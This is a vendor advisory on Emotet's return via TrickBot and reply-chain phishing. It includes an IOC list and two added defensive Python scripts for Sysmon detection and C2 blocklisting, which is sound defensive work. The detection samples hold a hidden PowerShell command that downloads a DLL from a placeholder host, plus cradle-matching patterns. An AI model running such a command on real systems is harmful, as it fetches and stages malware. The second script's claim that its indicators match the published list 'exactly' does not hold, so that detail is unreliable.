Overview of Emotet

Emotet, last seen in January 2021 just before a coordinated law enforcement takedown, is back. This time existing TrickBot infections are being used to install the Emotet loader on already-compromised Windows systems. TrickBot is a malware botnet that cyber criminals commonly use to load secondary payloads, and it is frequently seen in ransomware incidents.

After 10 months of darkness, Emotet was recently seen by cyber security researcher Brad Duncan spamming multiple email campaigns to infect devices with the malware. The campaigns use reply-chain emails to persuade victims into opening malicious attachments disguised as Word or Excel documents, or delivered inside password-protected ZIP files. Reply-chain email attacks are a form of social engineering in which the attacker replies to a stolen, legitimate email thread from a genuine but compromised account, so the malicious message arrives as part of a conversation the recipient already recognizes. Some of the reply-chain lures Duncan discovered involved a missing wallet, a canceled meeting, and even political donations.

Currently, two malicious document types are being distributed. The first is an Excel attachment that asks the victim to click “Enable Content” to view its contents. The other is a Word attachment claiming the document is in “Protected” mode and that the user must enable content and editing to view it. Once the victim opens the attachment and clicks through, the malicious macros run and launch a PowerShell command that downloads the Emotet loader DLL from a compromised WordPress site.

After being downloaded, Emotet configures a startup value under the following:  

HKCU\Software\Microsoft\Windows\CurrentVersion\Run  

This is done so the malware launches every time Windows starts. Emotet then runs silently in the background, waiting for commands from its C2. Those commands can be used to steal email account information, spread the malware to other computers, or install additional payloads such as TrickBot. Emotet was once considered the largest botnet the security community had ever seen; let’s not give it a reason to regain that title. Keep your organization from becoming another victim by staying educated on cyber security best practices.
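The infection chain described above (an Office macro spawning PowerShell, followed by a Run-key value that launches the loader DLL) is what an EDR or SIEM rule should key on. The following is an added example, not code from the original notice or from Avertium: it runs two checks over a handful of constructed, Sysmon-style event records (Event ID 1 process creation and Event ID 13 registry value set). The field names follow Sysmon's schema; the sample events, paths, SID and URL are made up for this example, and example.invalid is a reserved name that resolves nowhere.

```python
import re

# Parent processes that should never need to launch a script host on a
# typical workstation, and the script hosts macros use to stage payloads.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}

# Sysmon records HKCU as HKU\<SID>, so match on the key path below the hive.
RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\",
                     re.IGNORECASE)
# A Run-key value that hands a DLL to a living-off-the-land loader.
DLL_LOADER = re.compile(r"(rundll32|regsvr32)(\.exe)?\b.*\.dll", re.IGNORECASE)
# Download cradles and evasion switches typical of macro-launched PowerShell.
CRADLE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|"
                    r"net\.webclient|start-bitstransfer", re.IGNORECASE)
HIDDEN_OR_ENCODED = re.compile(r"-w\S*\s+hidden|-e(nc|ncodedcommand)?\b",
                               re.IGNORECASE)


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_process_create(ev):
    """Sysmon Event ID 1: an Office process launching a script host."""
    if ev.get("event_id") != 1:
        return None
    if _basename(ev["parent_image"]) not in OFFICE_PARENTS:
        return None
    if _basename(ev["image"]) not in SCRIPT_HOSTS:
        return None
    cmd = ev.get("command_line", "")
    return {
        "rule": "office_spawns_script_host",
        "parent": _basename(ev["parent_image"]),
        "child": _basename(ev["image"]),
        "download_cradle": bool(CRADLE.search(cmd)),
        "hidden_or_encoded": bool(HIDDEN_OR_ENCODED.search(cmd)),
    }


def check_registry_set(ev):
    """Sysmon Event ID 13: a Run-key value that loads a DLL via rundll32/regsvr32."""
    if ev.get("event_id") != 13:
        return None
    if not RUN_KEY.search(ev["target_object"]):
        return None
    if not DLL_LOADER.search(ev.get("details", "")):
        return None
    return {"rule": "run_key_dll_persistence",
            "value_name": ev["target_object"].rsplit("\\", 1)[-1],
            "command": ev["details"]}


def scan(events):
    """Run both checks over a list of event dicts and return the hits in order."""
    hits = []
    for ev in events:
        for check in (check_process_create, check_registry_set):
            hit = check(ev)
            if hit:
                hits.append(hit)
    return hits


# Constructed sample events (hypothetical paths, SID and URL).
SAMPLE_EVENTS = [
    {   # Excel macro launching a hidden PowerShell download cradle (malicious)
        "event_id": 1,
        "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": r'''powershell.exe -w hidden -nop -c "(New-Object Net.WebClient).DownloadFile('http://example.invalid/wp-content/up.dll', $env:TEMP + '\rihxd.dll')"''',
    },
    {   # An administrator opening a shell from Explorer (benign)
        "event_id": 1,
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\cmd.exe",
        "command_line": "cmd.exe /c dir",
    },
    {   # Run-key value launching a DLL from %TEMP% via rundll32 (malicious)
        "event_id": 13,
        "target_object": r"HKU\S-1-5-21-1004336348-1177238915-682003330-1001\Software\Microsoft\Windows\CurrentVersion\Run\Update",
        "details": r"rundll32.exe C:\Users\alice\AppData\Local\Temp\rihxd.dll,Control_RunDLL",
    },
    {   # Run-key value for a legitimate application (benign)
        "event_id": 13,
        "target_object": r"HKU\S-1-5-21-1004336348-1177238915-682003330-1001\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
        "details": r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    },
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

The process-creation check fires on the parent/child pair alone; the cradle and hidden/encoded flags are attached as context so an analyst can prioritise, not as preconditions, because a macro that runs a plain `powershell.exe` with an obfuscated argument would otherwise slip past. The registry check deliberately ignores the value name, which Emotet chooses at random, and keys on the loader binary and `.dll` argument instead.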


How Avertium is Protecting Our Clients

  • Increasing visibility within your environment is crucial when trying to prevent or mitigate a potential attack from botnets like Emotet. Avertium offers EDR protection through SentinelOne, Sophos, and Microsoft Defender. 
    • SentinelOne prevents threats and extends protection from the endpoint outward. It finds threats and eliminates blind spots with autonomous, real-time, index-free ingestion and analysis of structured, unstructured, and semi-structured data.
    • Our partners Microsoft and Sophos also offer endpoint protection. Sophos helps secure your environment by detecting and prioritizing potential threats. Microsoft Defender provides real-time threat detection as well as firewall and network protection, and comes standard with Windows. 
  • Avertium also offers user awareness training and phishing simulation campaigns using KnowBe4. 


Avertium's recommendations

  • Block communication to known C2s at the firewall and web proxy to prevent Emotet from dropping payloads on compromised devices, and alert on blocked attempts: an outbound connection to a C2 address is itself a sign that the source host is already infected.
  • Abuse.ch, a malware monitoring organization, maintains a list of 245 Emotet C2 IP addresses to block. Review the list and apply it in your environment as appropriate.  
  • Apply security patches to your devices as soon as they are released.  
  • Provide awareness training for employees regarding the dangers of phishing emails, including replies that appear to continue an existing conversation. 

Indicators of Compromise (IOCs)

  • 181.167.35.84
  • 47.146.32.175
  • 45.173.88.33
  • 125.63.106.22
  • 103.8.26.102
  • 94.177.248.64
  • 66.42.55.5
  • 103.8.26.103
  • 81.0.236.93
  • 188.93.125.116
  • 45.76.176.10
  • 168.197.250.14
  • 51.178.61.60
  • 185.148.169.10
  • 51.210.242.234
  • 196.44.98.190
  • 177.72.80.14
  • 210.57.217.132
  • 51.68.175.8
  • 45.79.33.48
  • 103.161.172.108
  • 163.172.50.82
  • 93.188.167.97
  • 185.184.25.237
  • 202.29.239.161
  • 191.252.196.221
  • 91.200.186.228
  • 31.220.49.39
  • 122.129.203.163
  • 58.227.42.236
  • 103.75.201.2
  • 104.251.214.46
  • 138.185.72.26
  • 178.79.147.66
  • 195.154.133.20
  • 207.38.84.195
  • 212.237.5.209
  • 45.118.135.203
  • 45.142.114.231
  • Ranvipclub[.]net
  • visteme[.]mx
  • newsmag.danielolayinkas[.]com
  • av-quiz[.]tk
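Turning the indicators above, and the recommendation to block C2 communication, into something operational means normalising the list (it mixes IP addresses with defanged domains and, as published, contains duplicates and stray whitespace) and then matching it against egress logs. The following is an added example, not code from the original notice or from Avertium: it takes a subset of the published indicators exactly as they appear above, builds IP and domain blocklists, emits illustrative outbound drop rules, and searches a few constructed key=value egress log lines. The log format, source addresses and the "clean" destinations (RFC 5737 documentation ranges and example domains) are assumptions made for this example.

```python
import ipaddress
import re

# A subset of the indicators published in this notice, kept exactly as they
# appear there: mixed IPs and defanged domains, a trailing space, one duplicate.
RAW_IOCS = [
    "181.167.35.84", "103.8.26.102", "103.8.26.103", "94.177.248.64 ",
    "103.8.26.102",
    "Ranvipclub[.net]", "visteme[.mx]", "newsmag.danielolayinkas[.com]",
    "av-quiz[.tk]",
]

DOMAIN_RE = re.compile(r"[a-z0-9-]+(\.[a-z0-9-]+)*\.[a-z]{2,}")


def refang(ioc):
    """Normalise one indicator: trim, lower-case, undo hxxp and bracket defanging."""
    value = ioc.strip().lower().replace("hxxp", "http")
    # Handles both the usual "example[.]com" and the "example[.com]" form used above.
    return value.replace("[", "").replace("]", "")


def build_blocklist(raw_iocs):
    """Split indicators into (ips, domains) sets; rejects anything unrecognised."""
    ips, domains = set(), set()
    for ioc in raw_iocs:
        value = refang(ioc)
        try:
            ips.add(str(ipaddress.ip_address(value)))
        except ValueError:
            if DOMAIN_RE.fullmatch(value):
                domains.add(value)
            else:
                raise ValueError(f"unrecognised indicator: {ioc!r}")
    return ips, domains


def firewall_rules(ips):
    """One outbound drop rule per C2 address (iptables syntax as an illustration)."""
    return [f"iptables -A OUTPUT -d {ip} -j DROP"
            for ip in sorted(ips, key=ipaddress.ip_address)]


# Constructed egress log lines in a simple key=value format (hypothetical).
SAMPLE_LOG = """\
2021-11-16T10:02:11Z src=10.0.4.17 dst=103.8.26.102 dport=8080 host=-
2021-11-16T10:02:12Z src=10.0.4.17 dst=192.0.2.10 dport=443 host=www.example.com
2021-11-16T10:03:40Z src=10.0.4.22 dst=198.51.100.7 dport=80 host=NEWSMAG.danielolayinkas.com
2021-11-16T10:04:15Z src=10.0.4.22 dst=198.51.100.8 dport=443 host=cdn.visteme.mx
2021-11-16T10:05:02Z src=10.0.4.9 dst=203.0.113.5 dport=443 host=ranvipclub.net.example.org
"""

LOG_RE = re.compile(r"^(?P<ts>\S+) src=(?P<src>\S+) dst=(?P<dst>\S+) "
                    r"dport=(?P<dport>\d+) host=(?P<host>\S+)$")


def match_log(log_text, ips, domains):
    """Return (timestamp, source, kind, indicator) for each line that touches a C2."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not parse rather than guess at them
        rec = m.groupdict()
        host = rec["host"].lower()
        if rec["dst"] in ips:
            hits.append((rec["ts"], rec["src"], "ip", rec["dst"]))
            continue
        for domain in domains:
            # Exact match or a real subdomain; a lookalike such as
            # "ranvipclub.net.example.org" must not match.
            if host == domain or host.endswith("." + domain):
                hits.append((rec["ts"], rec["src"], "domain", domain))
                break
    return hits


if __name__ == "__main__":
    ips, domains = build_blocklist(RAW_IOCS)
    print("\n".join(firewall_rules(ips)))
    for hit in match_log(SAMPLE_LOG, ips, domains):
        print("C2 contact:", hit)
```

The source address in each hit is the host to triage, since a connection attempt to a listed C2 (whether or not the firewall dropped it) means that machine already ran the loader; blocking alone stops the follow-on payload, not the infection that is already present.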


References

Emotet, once the world's most dangerous malware, is back | ZDNet 

Here are the new Emotet spam campaigns hitting mailboxes worldwide (bleepingcomputer.com) 

Emotet botnet disrupted after global takedown operation (bleepingcomputer.com)  

Emotet Command and Control Servers - AlienVault - Open Threat Exchange 

TrickBot helps Emotet come back from the dead | Malwarebytes Labs - AlienVault - Open Threat Exchange 
